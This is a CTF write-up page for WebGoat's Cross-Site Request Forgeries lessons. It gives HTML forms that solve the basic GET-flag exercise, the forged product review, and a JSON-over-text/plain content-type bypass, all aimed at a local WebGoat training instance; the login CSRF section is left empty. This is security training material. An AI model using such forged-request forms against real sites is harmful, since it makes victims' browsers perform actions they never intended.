Writeup-CTF
  • CTF events
    • DamCTF-2021
    • N1CTF 2021
    • WANNAGAME CHAMPIONSHIP2021
      • After end
    • DefCamp CTF 21-22
  • Root-me
    • SQL Injection - Filter bypass
    • GraphQL
    • JSON Web Token (JWT) - Public key
    • LDAP injection - Blind
    • Python - Blind SSTI Filters Bypass
    • SQL Injection - Filter bypass
    • SQL Truncation
    • Page 1
    • [Root-me]PHP - Unserialize overflow
  • WebGoat
    • Injection
    • XXE
    • Broken Authentication
      • JWT Token
      • Password reset
    • Sensitive Data Exposure
      • Insecure login
    • Broken Access Control
      • Insecure Direct Object References
    • Cross Site Scripting (XSS)
    • Cross site request forgery
      • Cross-Site Request Forgeries
      • Server-Side Request Forgery
    • Client site
      • Client site filtering
      • Bypass front-end restrictions
      • HTML tampering
    • Insecure Deserialization
    • Vulnerable Components
    • Challenges
      • Admin lost password
      • Without password
      • Without account
Powered by GitBook
On this page
  • 3/ Basic Get CSRF Exercise
  • 4/ Post a review on someone else’s behalf
  • 7/ CSRF and content-type
  • 8/ Login CSRF attack
  1. WebGoat
  2. Cross site request forgery

Cross-Site Request Forgeries

3/ Basic Get CSRF Exercise

<html>
<body>
 <form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
  <input name="csrf" value="false" type="hidden">
  <input name="submit" type="hidden" value="submit-Query">
  <input type="submit" value="Submit">
 </form>
</body>
</html>

4/ Post a review on someone else’s behalf

<html>
    <form method="POST" action="http://localhost:8080/WebGoat/csrf/review">
        <input class="form-control" name="reviewText" type="text">
        <input class="form-control" name="stars" type="text">
        <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
        <input type="submit" name="submit" value="Submit review">
    </form>
</html>

7/ CSRF and content-type

<form enctype="text/plain" method="POST" action="http://localhost:8080/WebGoat/csrf/feedback/message">
	<input type="hidden" name='{"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignoreme":"' value='sdfsdfdf"}'>
	<button>submit</button>
</form>

8/ Login CSRF attack

PreviousCross site request forgeryNextServer-Side Request Forgery

Last updated 3 years ago